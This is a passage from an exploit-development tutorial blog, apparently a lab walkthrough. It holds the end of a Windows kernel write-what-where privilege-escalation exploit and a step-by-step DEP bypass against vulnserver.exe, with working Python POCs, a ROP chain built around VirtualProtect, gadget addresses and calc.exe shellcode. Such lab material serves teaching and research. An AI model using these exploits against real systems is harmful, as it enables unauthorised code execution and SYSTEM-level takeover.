    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for NT AUTHORITY\SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here is where What and Where come into play. We create an instance of the WriteWhatWhere class called write_what_where and set its What field to the address of a pointer to our shellcode. The same thing happens with Where, but it receives the address of HalDispatchTable + 0x4. In the end, a pointer to write_what_where, which now holds both our pointer to the shellcode and HalDispatchTable + 0x4, is passed to the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peek here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place is that, after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables, it does not matter. The pointer to our shellcode will already be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that the pointer at HalDispatchTable + 0x4 gets called (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls through HalDispatchTable + 0x4). And then just like that- our payload will be executed!
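The control flow is easier to see in a toy model. The sketch below uses a plain Python list in place of the HalDispatchTable and ordinary functions in place of kernel routines. Every name in it is a stand-in of my own, and nothing here touches the real kernel. Index 1 plays the role of HalDispatchTable + 0x4, since entries are 4 bytes wide on x86.

```python
def original_hal_routine():
    return "original HAL routine"

def shellcode():
    return "attacker shellcode"

# Index 0 is a placeholder for the first table entry; index 1 models
# the function pointer stored at HalDispatchTable + 0x4.
hal_dispatch_table = [None, original_hal_routine]

def ke_query_interval_profile():
    # Calls whatever pointer currently sits in the second table slot
    return hal_dispatch_table[1]()

def nt_query_interval_profile():
    # The user-callable entry point simply forwards to the Ke routine
    return ke_query_interval_profile()

before = nt_query_interval_profile()

# The write-what-where: replace the pointer, not the calling code
hal_dispatch_table[1] = shellcode

after = nt_query_interval_profile()

print("before overwrite: {0}".format(before))
print("after overwrite:  {0}".format(after))
```

Neither calling function changes between the two calls. Only the table entry does, which is why the arguments passed to NtQueryIntervalProfile() are irrelevant to the exploit.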

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, the four policy settings are OptIn, OptOut, AlwaysOn, and AlwaysOff.

Knowing the applicable information on how DEP is implemented, figuring out how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)
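For reference, here is a short lookup of the common memory protection constants that flNewProtect accepts, as defined in the Windows headers. The dictionary and the helper name describe_protection are just a convenience of my own for reading values like 0x40 in a debugger or a POC.

```python
# Common memory protection constants from the Windows headers (winnt.h)
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

def describe_protection(fl_new_protect):
    # Translate a numeric protection value into its symbolic name
    return PAGE_PROTECTIONS.get(
        fl_new_protect, "unknown (0x{0:02x})".format(fl_new_protect)
    )

print(describe_protection(0x40))   # the value this post passes as flNewProtect
print(describe_protection(0x04))   # writable but not executable
```

Under DEP, the stack is writable but not executable. The goal of the VirtualProtect() call is to move the pages holding the shellcode to 0x40.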

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get run?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever the stack pointer points to (the top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening until there are no more left! This makes life a bit easier.
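That loop can be sketched as a tiny emulator. This is a toy model under loud assumptions: the gadget addresses (0x1000, 0x2000, 0x3000) and the gadgets themselves are made up for illustration, and the "stack" is a Python list rather than real memory. It only demonstrates how ret keeps pulling the next address off the stack.

```python
def pop_eax(regs, stack):
    # pop eax ; ret  (consumes the next stack value as data)
    regs["eax"] = stack.pop(0)

def add_eax_4(regs, stack):
    # add eax, 4 ; ret
    regs["eax"] = (regs["eax"] + 4) & 0xFFFFFFFF

def mov_ecx_eax(regs, stack):
    # mov ecx, eax ; ret
    regs["ecx"] = regs["eax"]

# Hypothetical addresses mapping to instructions that "already exist"
GADGETS = {0x1000: pop_eax, 0x2000: add_eax_4, 0x3000: mov_ecx_eax}

def run_chain(chain, gadgets):
    regs = {"eax": 0, "ecx": 0}
    stack = list(chain)                 # copy so the caller's chain is untouched
    while stack:
        address = stack.pop(0)          # ret: load top of stack into EIP
        gadget = gadgets.get(address)
        if gadget is None:
            break                       # unmapped address: a crash in real life
        gadget(regs, stack)
    return regs

# Addresses interleaved with data, exactly how a chain sits on the stack
chain = [0x1000, 0x40, 0x2000, 0x3000]
regs = run_chain(chain, GADGETS)
print("eax={0} ecx={1}".format(hex(regs["eax"]), hex(regs["ecx"])))
```

Notice that nothing on the stack is ever executed. The stack only supplies addresses and data, which is why DEP does not stop the chain.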

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f option specifies the file. The -r option specifies the maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find an lpflOldProtect address. You can literally place any address in this parameter, as long as it has write permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash (no ROP gadgets have been added yet)
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an extra value in the parameters variable, labeled return address, was added into the POC. This is not one of the official parameters for VirtualProtect(). The reason this address is there (directly under the VirtualProtect() function pointer) is that when VirtualProtect() finishes, it returns to whatever address sits in this slot, just as it would after a normal call. The return address is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. By then, the location of the shellcode will be marked as read, write, and execute.
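To visualize that layout, here is a small sketch that packs the same six placeholder DWORDs from the POC and prints where each one sits relative to the start of the block. The field names follow the VirtualProtect() prototype. The build_frame helper is just something made up for this illustration.

```python
import struct

FIELDS = ["VirtualProtect", "return address", "lpAddress",
          "dwSize", "flNewProtect", "lpflOldProtect"]


def build_frame(values):
    """Pack each value as a little-endian DWORD, in stack order."""
    return b"".join(struct.pack("<L", value) for value in values)


# Placeholder values taken from the POC
placeholders = [0x77e22e15, 0x4c4c4c4c, 0x45454545,
                0x03030303, 0x54545454, 0x62506060]
frame = build_frame(placeholders)

for offset, name in zip(range(0, len(frame), 4), FIELDS):
    (value,) = struct.unpack_from("<L", frame, offset)
    print("+0x%02x  %-15s 0x%08x" % (offset, name, value))
```

The return address slot lands at +0x04, directly under the function pointer, which is exactly where a normal call instruction would have left it.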

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode cannot be executed until VirtualProtect() changes the permissions on the memory it lives in. It can be written in advance because DEP still allows us to write to the stack, so long as we do not execute from it.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is how we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.
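If it helps, here is a tiny model of those two gadgets in Python. It is only a sketch: the registers are a dictionary, the stack is a dictionary of address to DWORD, and the starting ESP value is just the one seen in the debugger earlier. The 0x41414141 entry stands in for whatever comes next in the chain.

```python
def run_save_esp(stack_base):
    """Model `push esp ; pop ecx ; ret` followed by `mov eax, ecx ; ret`."""
    regs = {"esp": stack_base, "eax": 0, "ecx": 0, "eip": 0}
    # When gadget 1 starts running, ESP already points at gadget 2's slot
    memory = {
        stack_base: 0x77e4a5e6,      # mov eax, ecx ; ret
        stack_base + 4: 0x41414141,  # stand-in for the next chain entry
    }

    def push(value):
        regs["esp"] -= 4
        memory[regs["esp"]] = value

    def pop():
        value = memory[regs["esp"]]
        regs["esp"] += 4
        return value

    # Gadget 1: push esp ; pop ecx ; ret
    push(regs["esp"])       # the value pushed is ESP before the decrement
    regs["ecx"] = pop()
    regs["eip"] = pop()     # ret loads the next gadget address

    # Gadget 2: mov eax, ecx ; ret
    regs["eax"] = regs["ecx"]
    regs["eip"] = pop()
    return regs


regs = run_save_esp(0x018DF9E4)
print({name: hex(value) for name, value in regs.items()})
```

Notice that the saved value is the address of the second gadget's slot on the stack, not the address of the first one. That detail matters later when we start counting bytes from the saved pointer.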

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place a breakpoint on the stack pivot ret instruction and step through with F7 at each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to execute or overwrite those parameters yet, we would simply like to “jump” over them for now. To do this, we can add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be greater than the current stack pointer (which currently points to the VirtualProtect() pointer). This means we will be farther down in the stack (past the VirtualProtect() call and its parameters). Since all of our ROP gadgets end with a ret, the value located at the new (greater) stack pointer will be loaded into EIP by the ret instruction in add esp, VALUE + ret. This will make more sense in the screenshots below, which show the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.
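You can also sanity check the 0x1C jump without a debugger. The sketch below rebuilds only the bytes that come after the stack pivot and looks at what sits 0x1C bytes past the point ESP is at when add esp, 0x1C runs. The dword helper and the variable names are just for this illustration. The values are the ones from the POC.

```python
import struct


def dword(value):
    """Pack a value as a little-endian DWORD."""
    return struct.pack("<L", value)


rop = dword(0x77bf58d2) + dword(0x77e4a5e6) + dword(0x6ff821d5)
parameters = b"".join(dword(v) for v in (
    0x77e22e15, 0x4c4c4c4c, 0x45454545, 0x03030303, 0x54545454, 0x62506060))
padding = b"\x90" * 4
rop2 = dword(0xDEADBEEF)

after_pivot = rop + parameters + padding + rop2

# When add esp, 0x1C executes, ESP already points just past the third gadget's slot
esp_offset = len(rop)
landing = esp_offset + 0x1C

(next_eip,) = struct.unpack_from("<L", after_pivot, landing)
print(hex(next_eip))  # 0xdeadbeef
```

0x1C is 28 bytes: 24 bytes for the six DWORDs in parameters, plus the 4 bytes of padding. That is why the extra four NOPs are needed before rop2.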

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take the value ESP points to (0xDEADBEEF) and load it into EIP. What this means, is that if all goes well, we will have jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now that all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll
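Rather than counting by hand, the number of inc ecx gadgets can be worked out from the two addresses seen in the debugger. This is just a sketch of the arithmetic. The addresses come from my run and will differ on your machine, and the variable names are made up for the example.

```python
import struct

INC_ECX = 0x77e17270        # inc ecx ; ret (kernel32.dll)

saved_esp = 0x019FF9E4      # value currently in ECX (old stack pointer)
return_slot = 0x019FF9F0    # address of the return address placeholder

# Each inc ecx gadget moves ECX forward by exactly one byte
delta = return_slot - saved_esp

rop2 = struct.pack("<L", INC_ECX) * delta
print(delta, len(rop2))
```

This builds the same bytes as writing the gadget out twelve times, which is what the POC does so each step can be followed in the debugger.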

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains the address of the return parameter placeholder. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the address of the return parameter placeholder, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.
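One way to keep track of this is a small helper that emits a gadget address followed by one filler DWORD for every extra pop the gadget performs. This is only a sketch and the helper is hypothetical. It is not something the POCs in this post use, since they write each entry out by hand.

```python
import struct


def gadget(address, pops=0, filler=0x50505050):
    """Pack a gadget address plus one filler DWORD per extra `pop` it executes."""
    return struct.pack("<L", address) + struct.pack("<L", filler) * pops


chain = gadget(0x6ffb6162, pops=1)   # mov edx, ecx ; pop ebp ; ret
chain += gadget(0x77f226d5) * 4      # inc edx ; ret, four times

words = struct.unpack("<%dL" % (len(chain) // 4), chain)
print([hex(word) for word in words])
```

Reading the output in order: the first DWORD goes to EIP, the second is eaten by pop ebp, and the third is what the gadget's ret actually returns to.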

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
